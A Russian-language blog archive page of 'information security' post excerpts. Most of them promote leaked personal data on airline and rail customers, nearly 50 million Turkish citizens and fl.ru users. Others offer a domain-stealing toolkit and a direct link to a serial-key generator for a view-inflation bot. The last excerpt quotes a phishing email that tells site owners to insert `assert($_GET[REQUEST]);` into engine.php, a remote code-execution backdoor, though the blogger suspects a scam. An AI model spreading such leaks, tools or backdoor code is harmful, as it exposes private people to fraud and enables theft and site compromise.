Архив рубрики: Информационная безопасность

3500 документов с личными данными клиентов РЖД, Аэрофлота и S7

Документы оказались в открытом доступе из-за оплошности администрации сервиса traveladmin.ru — системы управления продажами билетов, бронирования отелей и оплаты страховок. Просмотреть все 3,5 тысячи документов можно по прямой ссылке — доступ к ним никак не ограничен. Читать далее 3500 документов с личными данными клиентов РЖД, Аэрофлота и S7

Полная база жителей Турции (49 611 709 жителей)

Turkish Citizenship Database

Текст с оригинальной страницы, перевел только часть о данных, остальное решил оставить as is.

Who would have imagined that backwards ideologies, cronyism and rising religious extremism in Turkey would lead to a crumbling and vulnerable technical infrastructure?

This leak contains the following information for 49,611,709 Turkish citizens: (IN CLEARTEXT)

  • Национальный идентификатор (TC Kimlik No)
  • Имя
  • Фамилия
  • Имя матери
  • Имя отца
  • Пол
  • Город рождения
  • Дата рождения
  • ID Города регистрации и Район
  • Полный адрес

Читать далее Полная база жителей Турции (49 611 709 жителей)

Отключение слежки в Windows 10 Новый метод

Блокировка идёт через firewall и дабы не выполнять эту рутинную работу по добавлению адресов по каждому серверу, мы будем использовать готовый скрипт.

Читать далее Отключение слежки в Windows 10 Новый метод

180 тысяч пользователей fl.ru с телефонами (слив, база)

Слив данных 180 тысяч пользователей FL.ru

Вчера стала известна информация, что неизвестным хакером были взломaны аккаунты администраторов биржи FL.ru (old Free-lance.ru).

База фриланс (fl.ru) с телефонами — удалено

формат: логин — email — имя — телефон

Domain Steal скачать

DomainSteal — набор программ для кражи пустых (свободных) доменов.

Программа использует tor вместо прокси, поэтому для начала нам нужно установить «Vidalia Bridge Bundle»,  для windows он уже есть в архиве

=========== Читать далее Domain Steal скачать

MagicViews Серийный ключ (serial key)

Сегодня попробовал скачать программу для накрутки просмотров на ютубе (Magic Views) — хотел накрутить просмотры ссылки, но увы.
Насчёт того работает она или нет — не знаю.

В общем для получения ключа нас кидают на сайт. Там нужно пройти рекламный опрос — короче подстава одним словом.
Я покопался в исходниках, нашёл скрипт, а в нём ссылку на файл php отвечающий за генерацию серийников.
В общем переходим по ссылке и пользуемся: http://youtubebots.org/magic-views-bot/generate.php

Поделись с друзьями, если помогло ;)

Критическая уязвимость сайтов на DLE

Screenshot_2014-10-19-11-03-12

 

Вот такое письмо пришло мне сегодня на почту от службы поддержки Datalife Engine. Я ожидал, что это будет сообщение о лицензии, но оказалось все намного серьезнее.

Здравствуйте, уважаемый клиент!



Благодарим Вас за использование на Вашем сайте shlyahten.ruнашего ПО «CMS DataLife Engine — Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: shlyahten.ru/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);



С уважением,

Служба поддержки «DataLife Engine»

IP адрес отправителя: 199.27.128.202 

У меня есть предложение, что это развод. Так как такой код вполне может создать уязвимость. Ведь он ничего не фильтрует. Очень забавный и на мой взгляд эффективный способ взлома.